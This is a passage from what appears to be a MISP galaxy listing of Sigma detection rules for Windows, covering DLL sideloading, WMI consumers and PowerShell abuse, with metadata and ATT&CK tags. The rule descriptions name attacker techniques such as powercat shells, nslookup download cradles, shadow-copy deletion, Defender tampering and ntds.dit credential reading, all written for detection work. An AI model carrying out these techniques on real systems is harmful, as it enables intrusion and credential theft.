creation_date 2023/06/09
falsepositive ['Unlikely']
filename image_load_side_load_edputil.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

GAC DLL Loaded Via Office Applications

Detects any GAC DLL being loaded by an Office Product

Internal MISP references

UUID 90217a70-13fc-48e4-b3db-0d836c5824ac which can be used as unique global reference for GAC DLL Loaded Via Office Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Legitimate macro usage. Add the appropriate filter according to your environment']
filename image_load_office_dotnet_gac_dll_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

DLL Sideloading Of ShellChromeAPI.DLL

Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter

Internal MISP references

UUID ee4c5d06-3abc-48cc-8885-77f1c20f4451 which can be used as unique global reference for DLL Sideloading Of ShellChromeAPI.DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/01
falsepositive ['Unknown']
filename image_load_side_load_shell_chrome_api.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential Iviewers.DLL Sideloading

Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)

Internal MISP references

UUID 4c21b805-4dd7-469f-b47d-7383a8fcb437 which can be used as unique global reference for Potential Iviewers.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/03/21
falsepositive ['Unknown']
filename image_load_side_load_iviewers.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious Volume Shadow Copy Vsstrace.dll Load

Detects the image load of VSS DLL by uncommon executables

Internal MISP references

UUID 48bfd177-7cf2-412b-ad77-baf923489e82 which can be used as unique global reference for Suspicious Volume Shadow Copy Vsstrace.dll Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/02/17
falsepositive ['Unknown']
filename image_load_dll_vsstrace_susp_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Active Directory Kerberos DLL Loaded Via Office Application

Detects Kerberos DLL being loaded by an Office Product

Internal MISP references

UUID 7417e29e-c2e7-4cf6-a2e8-767228c64837 which can be used as unique global reference for Active Directory Kerberos DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Unknown']
filename image_load_office_kerberos_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Wmiprvse Wbemcomn DLL Hijack

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

Internal MISP references

UUID 7707a579-e0d8-4886-a853-ce47e4575aaa which can be used as unique global reference for Wmiprvse Wbemcomn DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/12
falsepositive ['Unknown']
filename image_load_wmiprvse_wbemcomn_dll_hijack.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Microsoft VBA For Outlook Addin Loaded Via Outlook

Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process

Internal MISP references

UUID 9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed which can be used as unique global reference for Microsoft VBA For Outlook Addin Loaded Via Outlook in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Legitimate macro usage. Add the appropriate filter according to your environment']
filename image_load_office_outlook_outlvba_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Windows Spooler Service Suspicious Binary Load

Detect DLL Load from Spooler Service backup folder

Internal MISP references

UUID 02fb90de-c321-4e63-a6b9-25f4b03dfd14 which can be used as unique global reference for Windows Spooler Service Suspicious Binary Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye, Thomas Patzke (improvements)
creation_date 2021/06/29
falsepositive ['Loading of legitimate driver']
filename image_load_spoolsv_dll_load.yml
level informational
logsource.category image_load
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574', 'cve.2021.1675', 'cve.2021.34527']
Related clusters

To see the related clusters, click here.

Microsoft Office DLL Sideload

Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location

Internal MISP references

UUID 829a3bdf-34da-4051-9cf4-8ed221a8ae4f which can be used as unique global reference for Microsoft Office DLL Sideload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/08/17
falsepositive ['Unlikely']
filename image_load_side_load_office_dlls.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE

Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location

Internal MISP references

UUID e49b5745-1064-4ac1-9a2e-f687bc2dd37e which can be used as unique global reference for Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unknown']
filename image_load_side_load_gup_libcurl.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

VBA DLL Loaded Via Office Application

Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.

Internal MISP references

UUID e6ce8457-68b1-485b-9bdd-3c2b5d679aa9 which can be used as unique global reference for VBA DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Legitimate macro usage. Add the appropriate filter according to your environment']
filename image_load_office_vbadll_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Potential Chrome Frame Helper DLL Sideloading

Detects potential DLL sideloading of "chrome_frame_helper.dll"

Internal MISP references

UUID 72ca7c75-bf85-45cd-aca7-255d360e423c which can be used as unique global reference for Potential Chrome Frame Helper DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/08/17
falsepositive ['Unknown']
filename image_load_side_load_chrome_frame_helper.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

CLR DLL Loaded Via Office Applications

Detects CLR DLL being loaded by an Office Product

Internal MISP references

UUID d13c43f0-f66b-4279-8b2c-5912077c1780 which can be used as unique global reference for CLR DLL Loaded Via Office Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Unknown']
filename image_load_office_dotnet_clr_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

CredUI.DLL Loaded By Uncommon Process

Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

Internal MISP references

UUID 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 which can be used as unique global reference for CredUI.DLL Loaded By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/20
falsepositive ['Other legitimate processes loading those DLLs in your environment.']
filename image_load_dll_credui_uncommon_process_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.credential_access', 'attack.collection', 'attack.t1056.002']
Related clusters

To see the related clusters, click here.

Suspicious Encoded Scripts in a WMI Consumer

Detects suspicious encoded payloads in WMI Event Consumers

Internal MISP references

UUID 83844185-1c5b-45bc-bcf3-b5bf3084ca5b which can be used as unique global reference for Suspicious Encoded Scripts in a WMI Consumer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/09/01
falsepositive ['Unknown']
filename sysmon_wmi_susp_encoded_scripts.yml
level high
logsource.category wmi_event
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

WMI Event Subscription

Detects creation of WMI event subscription persistence method

Internal MISP references

UUID 0f06a3a5-6a09-413f-8743-e6cf35561297 which can be used as unique global reference for WMI Event Subscription in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure)
creation_date 2019/01/12
falsepositive ['Exclude legitimate (vetted) use of WMI event subscription in your network']
filename sysmon_wmi_event_subscription.yml
level medium
logsource.category wmi_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Suspicious Scripting in a WMI Consumer

Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers

Internal MISP references

UUID fe21810c-2a8c-478f-8dd3-5a287fb2a0e0 which can be used as unique global reference for Suspicious Scripting in a WMI Consumer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro
creation_date 2019/04/15
falsepositive ['Legitimate administrative scripts']
filename sysmon_wmi_susp_scripting.yml
level high
logsource.category wmi_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.005']
Related clusters

To see the related clusters, click here.

Netcat The Powershell Version

Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

Internal MISP references

UUID c5b20776-639a-49bf-94c7-84f912b91c15 which can be used as unique global reference for Netcat The Powershell Version in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/21
falsepositive ['Unknown']
filename posh_pc_powercat.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.command_and_control', 'attack.t1095']
Related clusters

To see the related clusters, click here.

Suspicious Non PowerShell WSMAN COM Provider

Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.

Internal MISP references

UUID df9a0e0e-fedb-4d6c-8668-d765dfc92aa7 which can be used as unique global reference for Suspicious Non PowerShell WSMAN COM Provider in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/24
falsepositive ['Unknown']
filename posh_pc_wsman_com_provider_no_powershell.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Use Get-NetTCPConnection

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

Internal MISP references

UUID b366adb4-d63d-422d-8a2c-186463b5ded0 which can be used as unique global reference for Use Get-NetTCPConnection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename posh_pc_susp_get_nettcpconnection.yml
level low
logsource.category ps_classic_start
logsource.product windows
tags ['attack.discovery', 'attack.t1049']
Related clusters

To see the related clusters, click here.

Remote PowerShell Session (PS Classic)

Detects remote PowerShell sessions

Internal MISP references

UUID 60167e5c-84b2-4c95-a7ac-86281f27c445 which can be used as unique global reference for Remote PowerShell Session (PS Classic) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/10
falsepositive ['Legitimate use remote PowerShell sessions']
filename posh_pc_remote_powershell_session.yml
level low
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

PowerShell Called from an Executable Version Mismatch

Detects PowerShell called from an executable by the version mismatch method

Internal MISP references

UUID c70e019b-1479-4b65-b0cc-cd0c6093a599 which can be used as unique global reference for PowerShell Called from an Executable Version Mismatch in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Metcalf (source), Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_pc_exe_calling_ps.yml
level high
logsource.category ps_classic_start
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Downgrade Attack - PowerShell

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

Internal MISP references

UUID 6331d09b-4785-4c13-980f-f96661356249 which can be used as unique global reference for PowerShell Downgrade Attack - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)
creation_date 2017/03/22
falsepositive ['Unknown']
filename posh_pc_downgrade_attack.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Delete Volume Shadow Copies Via WMI With PowerShell

Shadow Copies deletion using operating systems utilities via PowerShell

Internal MISP references

UUID 87df9ee1-5416-453a-8a08-e8d4a51e9ce1 which can be used as unique global reference for Delete Volume Shadow Copies Via WMI With PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/03
falsepositive ['Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason']
filename posh_pc_delete_volume_shadow_copies.yml
level high
logsource.category ps_classic_start
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Suspicious XOR Encoded PowerShell Command Line - PowerShell

Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.

Internal MISP references

UUID 812837bb-b17f-45e9-8bd0-0ec35d2e3bd6 which can be used as unique global reference for Suspicious XOR Encoded PowerShell Command Line - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Harish Segar (rule)
creation_date 2020/06/29
falsepositive ['Unknown']
filename posh_pc_xor_commandline.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Tamper Windows Defender - PSClassic

Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.

Internal MISP references

UUID ec19ebab-72dc-40e1-9728-4c0b805d722c which can be used as unique global reference for Tamper Windows Defender - PSClassic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/06/07
falsepositive ['Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.']
filename posh_pc_tamper_windows_defender_set_mp.yml
level high
logsource.category ps_classic_provider_start
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Zip A Folder With PowerShell For Staging In Temp - PowerShell

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID 71ff406e-b633-4989-96ec-bc49d825a412 which can be used as unique global reference for Zip A Folder With PowerShell For Staging In Temp - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/20
falsepositive ['Unknown']
filename posh_pc_susp_zip_compress.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Download

Detects suspicious PowerShell download command

Internal MISP references

UUID 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d which can be used as unique global reference for Suspicious PowerShell Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['PowerShell scripts that download content from the Internet']
filename posh_pc_susp_download.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Renamed Powershell Under Powershell Channel

Detects renamed powershell

Internal MISP references

UUID 30a8cb77-8eb3-4cfb-8e79-ad457c5a4592 which can be used as unique global reference for Renamed Powershell Under Powershell Channel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harish Segar, frack113
creation_date 2020/06/29
falsepositive ['Unknown']
filename posh_pc_renamed_powershell.yml
level low
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential RemoteFXvGPUDisablement.EXE Abuse

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

Internal MISP references

UUID f65e22f9-819e-4f96-9c7b-498364ae7a25 which can be used as unique global reference for Potential RemoteFXvGPUDisablement.EXE Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/07/13
falsepositive ['Unknown']
filename posh_pc_remotefxvgpudisablement_abuse.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Nslookup PowerShell Download Cradle

Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.

Internal MISP references

UUID 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 which can be used as unique global reference for Nslookup PowerShell Download Cradle in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam
creation_date 2022/12/10
falsepositive ['Unknown']
filename posh_pc_abuse_nslookup_with_dns_records.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Alternate PowerShell Hosts - PowerShell Module

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

Internal MISP references

UUID 64e8e417-c19a-475a-8d19-98ea705394cc which can be used as unique global reference for Alternate PowerShell Hosts - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/11
falsepositive ['Programs using PowerShell directly without invocation of a dedicated interpreter', 'MSP Detection Searcher', 'Citrix ConfigSync.ps1']
filename posh_pm_alternate_powershell_hosts.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher - PowerShell Module

Detects Obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 9ac8b09b-45de-4a07-9da1-0de8c09304a3 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_stdin.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Bad Opsec Powershell Code Artifacts

focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.

Internal MISP references

UUID 8d31a8ce-46b5-4dd6-bdc3-680931f1db86 which can be used as unique global reference for Bad Opsec Powershell Code Artifacts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author ok @securonix invrep_de, oscd.community
creation_date 2020/10/09
falsepositive ['Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.']
filename posh_pm_bad_opsec_artifacts.yml
level critical
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential Active Directory Enumeration Using AD Module - PsModule

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.

Internal MISP references

UUID 74176142-4684-4d8a-8b0a-713257e7df8e which can be used as unique global reference for Potential Active Directory Enumeration Using AD Module - PsModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023/01/22
falsepositive ['Legitimate use of the library for administrative activity']
filename posh_pm_active_directory_module_dll_import.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.reconnaissance', 'attack.discovery', 'attack.impact']

PowerShell Get Clipboard

A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.

Internal MISP references

UUID 4cbd4f12-2e22-43e3-882f-bff3247ffb78 which can be used as unique global reference for PowerShell Get Clipboard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename posh_pm_get_clipboard.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

PowerShell Decompress Commands

A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.

Internal MISP references

UUID 1ddc1472-8e52-4f7d-9f11-eab14fc171f5 which can be used as unique global reference for PowerShell Decompress Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename posh_pm_decompress_commands.yml
level informational
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

AD Groups Or Users Enumeration Using PowerShell - PoshModule

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Internal MISP references

UUID 815bfc17-7fc6-4908-a55e-2f37b98cedb4 which can be used as unique global reference for AD Groups Or Users Enumeration Using PowerShell - PoshModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Administrator script']
filename posh_pm_susp_ad_group_reco.yml
level low
logsource.category ps_module
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Clip - PowerShell Module

Detects Obfuscated Powershell via use Clip.exe in Scripts

Internal MISP references

UUID ebdf49d8-b89c-46c9-8fdf-2c308406f6bd which can be used as unique global reference for Invoke-Obfuscation Via Use Clip - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_use_clip.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module

Detects Obfuscated Powershell via VAR++ LAUNCHER

Internal MISP references

UUID f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6 which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_var.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Get Local Groups Information

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Internal MISP references

UUID cef24b90-dddc-4ae1-a09a-8764872f69fc which can be used as unique global reference for Suspicious Get Local Groups Information in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/12
falsepositive ['Administrator script']
filename posh_pm_susp_local_group_reco.yml
level low
logsource.category ps_module
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

Suspicious Get-ADDBAccount Usage

Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers

Internal MISP references

UUID b140afd9-474b-4072-958e-2ebb435abd68 which can be used as unique global reference for Suspicious Get-ADDBAccount Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/16
falsepositive ['Unknown']
filename posh_pm_get_addbaccount.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Clear PowerShell History - PowerShell Module

Detects keywords that could indicate clearing PowerShell history

Internal MISP references

UUID f99276ad-d122-4989-a09a-d00904a5f9d2 which can be used as unique global reference for Clear PowerShell History - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/25
falsepositive ['Legitimate PowerShell scripts']
filename posh_pm_clear_powershell_history.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below

Internal MISP references

UUID 2f211361-7dce-442d-b78a-c04039677378 which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_obfuscated_iex.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Malicious PowerShell Commandlets - PoshModule

Detects Commandlet names from well-known PowerShell exploitation frameworks

Internal MISP references

UUID 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c which can be used as unique global reference for Malicious PowerShell Commandlets - PoshModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/20
falsepositive ['Unknown']
filename posh_pm_malicious_commandlets.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1482', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1069.001', 'attack.t1069.002', 'attack.t1069', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Remote PowerShell Session (PS Module)

Detects remote PowerShell sessions

Internal MISP references

UUID 96b9f619-aa91-478f-bacb-c3e50f8df575 which can be used as unique global reference for Remote PowerShell Session (PS Module) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
creation_date 2019/08/10
falsepositive ['Legitimate use remote PowerShell sessions']
filename posh_pm_remote_powershell_session.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

Suspicious Get Information for SMB Share - PowerShell Module

